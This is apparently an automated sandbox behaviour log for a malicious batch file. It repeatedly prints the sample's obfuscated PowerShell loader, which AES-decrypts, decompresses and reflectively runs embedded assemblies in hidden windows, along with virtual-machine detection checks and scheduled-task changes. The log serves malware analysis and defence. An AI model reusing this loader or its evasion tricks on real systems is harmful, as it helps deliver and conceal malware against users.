Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: WMIC.exe, 00000017.00000003.1695574272.000002A260EAD000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.1698169437.000002A260EB0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000003.1697303203.000002A260EB0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000003.1696954523.000002A260EAD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT Manufacturer, Model FROM Win32_DiskDrive;
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1 (2).cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7080 -s 2400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7080 -s 2172
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
